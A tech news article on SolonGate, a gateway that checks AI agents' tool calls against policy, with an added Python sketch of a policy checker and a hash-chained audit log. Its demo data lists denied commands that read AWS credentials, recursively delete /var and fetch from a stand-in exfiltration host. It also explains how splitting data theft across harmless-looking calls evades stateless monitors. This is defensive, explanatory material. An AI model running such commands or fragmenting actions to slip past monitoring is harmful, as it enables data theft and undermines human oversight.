The AI agent security market has a new entrant, and it is taking a different approach. SolonGate, which launched on Product Hunt this week, describes itself as a “zero-trust security gateway for AI agents.” Instead of filtering prompts or scanning model outputs, it intercepts the tool calls that agents make before those calls execute. The company positions this as infrastructure-level security for autonomous agents in air-gapped and mission-critical environments.

The distinction matters. Most existing AI security products focus on the text layer: guardrails that block harmful prompts, output filters that catch toxic generations, and red-teaming frameworks that probe model behavior. Those tools address what the model says. They do not address what the agent does. A prompt filter cannot stop an agent from running rm -rf /var on a production server, because the dangerous action happens after the model finishes generating text. SolonGate targets that gap.

The company’s architecture is straightforward. SolonGate deploys as a zero-trust proxy in front of Model Context Protocol (MCP) servers. When an agent issues a tool call, the gateway reads the payload, checks it against a policy, and either allows or denies the call in milliseconds. The decision, along with the arguments, streams to a tamper-evident audit log. The company’s demo shows a live feed of denied actions: Bash cat ~/.aws/credentials DENY, Bash rm -rf /var DENY, WebFetch exfil.attacker.io DENY. Every call gets a decision before any code runs.

The timing is not accidental. Enterprise adoption of AI agents has accelerated sharply in 2026, driven by tools like Claude Code, Gemini CLI, and OpenClaw. These agents operate with file-system access, network permissions, and shell execution rights. They can read credentials, modify configuration files, and make outbound web requests. The security industry has been slow to build controls for this new attack surface. SolonGate is one of the first products to treat agent tool calls as a distinct security domain, separate from both traditional application security and LLM-specific guardrails.

The company’s founder, Emirhan Demir, made the positioning explicit on LinkedIn. “While the industry is busy filtering text prompts, we built a zero-trust gateway to stop autonomous AI agents from executing unauthorized commands,” he wrote. The company is offering a one-month free early access period and explicitly inviting security researchers to try bypassing the architecture. That last detail is worth noting: a security product that invites adversarial testing from day one signals confidence in its design, or at least a willingness to learn from failure fast.

SolonGate’s approach raises a question that the broader agent-security field has not fully answered. What level of access should an AI agent have to the systems it touches? The traditional model, where a human reviews and approves every action, defeats the purpose of autonomous agents. The opposite extreme, where an agent has full shell access and network permissions, is a security catastrophe waiting to happen. SolonGate sits in the middle: the agent can act autonomously, but within a policy envelope defined by the organization.

That policy envelope is the hard part. SolonGate can block rm -rf /var because the path and the command are obvious. It can block cat ~/.aws/credentials because the file is sensitive. But what about a command that reads a database connection string, uses it to query customer records, and writes the results to a log file? Each individual action might be permissible; in combination, they could amount to data exfiltration. SolonGate’s current architecture evaluates each call in isolation. The company’s documentation says the pipeline runs “from interception to decision to tamper-evident audit, in one deterministic pass.” That is fast, but it is also stateless.

The company has not disclosed whether it plans to add cross-call analysis or behavioral baselines. Those features would require maintaining state across tool calls, which complicates the architecture and introduces latency. For now, SolonGate appears to be betting that most agent abuse is obvious at the single-call level. That bet is probably correct for the first wave of enterprise agent deployments, where the biggest risks are accidental destruction of infrastructure and credential theft. It may not hold for more sophisticated attacks that distribute malicious activity across many innocuous-seeming calls.
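The pipeline the article describes (intercept the tool call, check it against policy, allow or deny, append to a tamper-evident audit log) and the stateless-versus-stateful problem of the last two paragraphs, as an added example in Python. This is not SolonGate's code and does not reflect its actual implementation. The call shape {"tool": name, "args": {...}} mirrors an MCP tools/call request; the tool names and the hostname exfil.attacker.io are taken from the article's demo feed; the egress allowlist, the policy rules, the taint labels and the sample traffic are constructed for this example.

```python
"""Illustrative zero-trust tool-call gateway: added example, not SolonGate's code.
A call is {"tool": name, "args": {...}}, mirroring an MCP tools/call request. Tool names and the
host exfil.attacker.io come from the article's demo feed; everything else here is constructed."""
import hashlib
import json
import re
import shlex
from urllib.parse import urlparse

ALLOWED_HOSTS = {"api.internal.example"}  # constructed egress allowlist
SENSITIVE_PATHS = (".aws/credentials", ".ssh/", ".env")
DB_CONFIG = re.compile(r"database\.(ya?ml|json)$")  # files that hold DB connection strings
GENESIS = "0" * 64

def evaluate(call):
    """Stateless policy check of one call -> (decision, reason). Anything unmatched is DENY."""
    tool, args = call.get("tool"), call.get("args", {})
    if tool == "Bash":
        try:
            argv = shlex.split(args.get("command", ""))
        except ValueError:
            return "DENY", "unparseable command"  # fail closed
        if argv and argv[0] == "rm":
            flags = "".join(a.lstrip("-") for a in argv[1:] if a.startswith("-"))
            if "r" in flags.lower():
                return "DENY", "recursive delete"
        if any(s in a for a in argv for s in SENSITIVE_PATHS):
            return "DENY", "sensitive path"
        return "ALLOW", "no shell rule matched"
    if tool == "WebFetch":
        host = urlparse(args.get("url", "")).hostname or ""
        return ("ALLOW", "host allowlisted") if host in ALLOWED_HOSTS else ("DENY", "host not allowlisted: " + host)
    if tool == "Read":
        hit = any(s in args.get("path", "") for s in SENSITIVE_PATHS)
        return ("DENY", "sensitive path") if hit else ("ALLOW", "readable path")
    if tool in ("Query", "Write"):
        return "ALLOW", tool + " permitted"
    return "DENY", "unknown tool"

def _digest(body):
    return hashlib.sha256(json.dumps(body, sort_keys=True).encode()).hexdigest()

class AuditLog:
    """Append-only SHA-256 hash chain; editing any stored entry makes verify() fail."""
    def __init__(self):
        self.entries = []

    def append(self, call, decision, reason):
        prev = self.entries[-1]["hash"] if self.entries else GENESIS
        body = {"prev": prev, "call": call, "decision": decision, "reason": reason}
        self.entries.append({**body, "hash": _digest(body)})

    def verify(self):
        prev = GENESIS
        for entry in self.entries:
            body = {k: v for k, v in entry.items() if k != "hash"}
            if body["prev"] != prev or _digest(body) != entry["hash"]:
                return False
            prev = entry["hash"]
        return True

class Gateway:
    """Intercept -> decide -> audit. With stateful=True, taints accumulate across the session."""
    def __init__(self, stateful=False):
        self.log, self.stateful, self.taints = AuditLog(), stateful, set()

    def handle(self, call):
        decision, reason = evaluate(call)
        if decision == "ALLOW" and self.stateful:
            decision, reason = self._check_history(call)
        self.log.append(call, decision, reason)
        return decision

    def _check_history(self, call):
        """Cross-call rule: config read, then query, then write/egress is treated as exfiltration."""
        tool, args = call["tool"], call.get("args", {})
        if tool == "Read" and DB_CONFIG.search(args.get("path", "")):
            self.taints.add("db_credentials")
        elif tool == "Query" and "db_credentials" in self.taints:
            self.taints.add("customer_data")
        elif tool in ("Write", "WebFetch") and "customer_data" in self.taints:
            return "DENY", "write/egress after credential read and record query"
        return "ALLOW", "history check passed"

def run(calls, stateful=False):
    """Push calls through a fresh gateway; returns (decisions in order, gateway) for inspection."""
    gw = Gateway(stateful=stateful)
    return [gw.handle(c) for c in calls], gw

# Constructed sample traffic: the article's demo feed, then the three-step chain it describes.
DEMO_CALLS = [
    {"tool": "Bash", "args": {"command": "cat ~/.aws/credentials"}},
    {"tool": "Bash", "args": {"command": "rm -rf /var"}},
    {"tool": "WebFetch", "args": {"url": "https://exfil.attacker.io/upload"}},
    {"tool": "Bash", "args": {"command": "ls -la /srv/app"}},
]
EXFIL_CHAIN = [
    {"tool": "Read", "args": {"path": "/srv/app/config/database.yml"}},
    {"tool": "Query", "args": {"sql": "SELECT email FROM customers"}},
    {"tool": "Write", "args": {"path": "/var/log/app/export.log"}},
]

if __name__ == "__main__":
    print(run(DEMO_CALLS)[0], run(EXFIL_CHAIN)[0], run(EXFIL_CHAIN, stateful=True)[0])
```

Run stand-alone, the demo feed produces DENY, DENY, DENY, ALLOW, matching the article's sample output. The three-step chain is the interesting case: with the stateless policy every call is allowed, which is exactly the gap the article points at, while the stateful gateway denies the final write because the same session already read a database config and queried records. The design choices worth noting are that the policy is default-deny (an unknown tool or an unparseable shell command is refused), and that the audit log is a hash chain, so changing a stored decision after the fact is detectable by verify().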

SolonGate’s compatibility with MCP servers is a strategic choice. MCP is emerging as a standard protocol for agent-tool communication, adopted by Anthropic, Google, and several open-source projects. By integrating at the MCP layer, SolonGate can intercept calls from any agent that speaks the protocol, without requiring agent-specific instrumentation. That is a significant advantage over agent-specific security tools that only work with one vendor’s platform.

The product is early. The company has 72 LinkedIn followers as of this writing. The architecture overview is not yet public. The demo shows sample traffic, not live customer data. But the concept is sound, and the timing is right. The AI agent market is growing faster than the security tooling around it. Every company deploying Claude Code or Gemini CLI in production is making a bet that their agents will not do anything catastrophic. SolonGate offers a second layer of defense, one that does not rely on the model’s own judgment.

For AI builders, the takeaway is practical. If you are deploying autonomous agents with file-system or network access, you should know exactly what tool calls those agents are making. If you cannot answer that question, you are running blind. SolonGate is one answer to that problem. It will not be the last.